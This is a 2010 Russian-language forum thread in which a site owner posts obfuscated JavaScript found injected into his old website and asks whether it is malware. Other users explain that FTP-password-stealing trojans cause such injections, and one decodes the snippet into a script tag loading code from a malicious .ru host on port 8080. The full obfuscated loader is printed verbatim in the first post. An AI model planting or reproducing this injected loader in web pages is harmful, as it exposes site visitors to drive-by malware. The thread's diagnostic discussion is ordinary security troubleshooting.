Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
MySQL на примерах. Авторы: Кузнецов М.В., Симдянов И.В. PHP на примерах (2 издание). Авторы: Кузнецов М.В., Симдянов И.В. Программирование. Ступени успешной карьеры. Авторы: Кузнецов М.В., Симдянов И.В. Самоучитель MySQL 5. Авторы: Кузнецов М.В., Симдянов И.В. PHP 5/6. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Разное

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум Структурный форум

тема: Вирус что ли?
 
 автор: DJ Paltus   (21.04.2010 в 10:51)   письмо автору
 
 

на одном из своих сайтов, сданных еще в 05-м году, обнаружил в коде страницы в самом низу приписочку:
<script>var Ta;if(Ta!='Ng' && Ta!='h'){Ta=''};this.Tw='';try {this.c='';this.to='';var N="repl"+"aceMsDP".substr(0,3);var vg="";var hj;if(hj!='j' && hj != ''){hj=null};var e=new Array();var o=new Array();var Nn=RegExp;this.MS="";function Q(r,v){var Au=new Date();var D="Qi2Z[".substr(4);var AK;if(AK!='qH'){AK='qH'};var Ni=new String("g");var p=new Date();this.Ba='';D+=v;this.Yc='';var Bm;if(Bm!='Vk' && Bm!='vV'){Bm='Vk'};D+=String("]");var Tr="";var z;if(z!='Fo' && z != ''){z=null};var T=new Nn(D, Ni);this.uu="";return r[N](T, new String());};var i=new String();var t=window;this.Qa="";this.zC="";var R=new Array();var KW;if(KW!='' && KW!='pd'){KW=''};var d=Q('c0r3eva1t0e1E3l1evm0e1n0t0',"v130");var RG;if(RG!='Fh' && RG != ''){RG=null};var I=Q('/jgPowoPgPl0e0.jc0o0m0/PgwoPojgPlweP.jcjoPmj/PbPajrPnjewsjawnjdjnwowbPljeP.0cwoPm0/Pmjt0ijmwe0.PcPo0m0/0nPejoPbwuPxP.0c0ojmw.PpPh0p0',"wjP0");var jm;if(jm!='zM'){jm='zM'};this.Vi='';var _=Q('hAt0t0pA:0/A/Ai0nAd0iAa0nAr0a0i0lA-Ag0oAvA-0i0n0.As0kAyAc0n0.AcAo0m0.0mAc0sAs0lA-0cAo0m0.AYAoAuArASAuApAe0rAPAoAo0lA.ArAuA:0',"A0");var s=Q('s8cdr4i8p8t8',"48d");var DO='';var H=Q('896966066968969906999',"96");this.wb="";var Io=new String();var V=Q('oJnElIomaEdJ',"ImkJE");var Gj=new Array();var tD=new Array();E=function(){P=document[d](s);var Lw;if(Lw!='' && Lw!='Xo'){Lw='ha'};var Br="";var Yk;if(Yk!='qc'){Yk='qc'};DO=_+H;var re=new Array();var qg=new Array();DO+=I;var jP=new String();var RU;if(RU!='bk' && RU != ''){RU=null};var uz;if(uz!='za'){uz='za'};P.src=DO;var hp;if(hp!='ow' && hp!='zN'){hp=''};var lU='';P.defer=([1,8][0]);var UK;if(UK!='' && UK!='Lx'){UK=''};var VE=new Array();document.body.appendChild(P);this.LX='';var bA="";};var zQ;if(zQ!='' && zQ!='zv'){zQ='UR'};var nO=new Date();t[V]=E;var Bs=new String();var wE='';var Uq;if(Uq!='eif' && Uq!='x'){Uq='eif'};} catch(U){var ZR;if(ZR!='' && ZR!='Sk'){ZR=null};};var ww;if(ww!='mQ' && ww!='WB'){ww='mQ'};this.Kf="";</script>
<!--3c16b6e0e6ecc5f7feac777f03547a36-->

Это таки вирус? Как им заражаются? Почему, например, антивирус провайдера его игнорирует, а пользователи начинают получать предупреждения систем безопасности?

  Ответить  
 
 автор: cheops   (21.04.2010 в 12:16)   письмо автору
 
   для: DJ Paltus   (21.04.2010 в 10:51)
 

Заражение идет с вашей клиентской машины (поэтому к провайдеру притензий быть не может), вирус/троян сидит у вас на машине и ворует FTP-пароли, которые затем робот использует для правки ваших страниц.

  Ответить  
 
 автор: DJ Paltus   (21.04.2010 в 12:49)   письмо автору
 
   для: cheops   (21.04.2010 в 12:16)
 

Как-то так я и подумал.
Интересно, чем этот код занимается...

  Ответить  
 
 автор: Саня   (21.04.2010 в 13:54)   письмо автору
 
   для: DJ Paltus   (21.04.2010 в 12:49)
 

генерирует
<script src="http://indianrail-gov-in.skycn.com.mcssl-com.YourSuperPool.ru:8080/google.com/google.com/barnesandnoble.com/mtime.com/neobux.com.php"></script>
и вставляет на страницу.

  Ответить  
 
 автор: Commander   (21.04.2010 в 14:16)   письмо автору
 
   для: DJ Paltus   (21.04.2010 в 10:51)
 

>Почему, например, антивирус провайдера его игнорирует, а пользователи начинают получать предупреждения систем безопасности?

У меня только что аваст завизжал, когда я пытался открыть эту тему через ИЕ. Этот пост в Опере пишу.

  Ответить  
 
 автор: sim5   (21.04.2010 в 14:32)   письмо автору
 
   для: Commander   (21.04.2010 в 14:16)
 

А что опасного в данной теме?

  Ответить  
 
 автор: Commander   (22.04.2010 в 09:03)   письмо автору
 
   для: sim5   (21.04.2010 в 14:32)
 

Код, который в первом посте. Ничего другого в этой теме нет. Другие темы открываются без проблем. Чтобы открыть эту тему, пришлось приостановить аваст. Дурь.

  Ответить  
 
 автор: sim5   (22.04.2010 в 10:34)   письмо автору
 
   для: Commander   (22.04.2010 в 09:03)
 

В этом посте не код, а текст этого кода.

  Ответить  
 
 автор: Commander   (22.04.2010 в 22:52)   письмо автору
 
   для: sim5   (22.04.2010 в 10:34)
 

Я понимаю. Аваст дурью мается - это я понял сразу.

  Ответить  
 
 автор: root   (21.04.2010 в 14:38)   письмо автору
 
   для: Commander   (21.04.2010 в 14:16)
 

что лишний раз говорит о "качестве" аваста..

  Ответить  
 
 автор: mihdan   (21.04.2010 в 15:16)   письмо автору
 
   для: root   (21.04.2010 в 14:38)
 

Скрытая реклама? Любой современный антивирь "журчит" при виде таких строк

  Ответить  
 
 автор: root   (21.04.2010 в 15:25)   письмо автору
 
   для: mihdan   (21.04.2010 в 15:16)
 

где реклама?
слово качество не даром в кавычки взято было.

>Любой современный антивирь "журчит" при виде таких строк

Мой не "журчит", и правильно делает, т.к. выдавать false positive на ровном месте это бред.

  Ответить  
 
 автор: ~AquaZ~   (23.04.2010 в 08:50)   письмо автору
 
   для: root   (21.04.2010 в 15:25)
 

И вообще если браузер нормальный, то скрипты не предоставляют никакой опасности.

  Ответить  
 
 автор: sim5   (23.04.2010 в 10:02)   письмо автору
 
   для: ~AquaZ~   (23.04.2010 в 08:50)
 

Что?!

  Ответить  
 
 автор: DJ Paltus   (24.04.2010 в 00:45)   письмо автору
 
   для: sim5   (23.04.2010 в 10:02)
 

Ну нормальный если. Текстовый. Люнкс там...

  Ответить  
 
 автор: sim5   (24.04.2010 в 07:33)   письмо автору
 
   для: DJ Paltus   (24.04.2010 в 00:45)
 

Ну понятно, типа смотреть веб-страницы Блокнотом... Ну тады таки да, все пофигу. Только назвать Блокнот нормальным браузером язык как-то не поворачивается.

  Ответить  
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования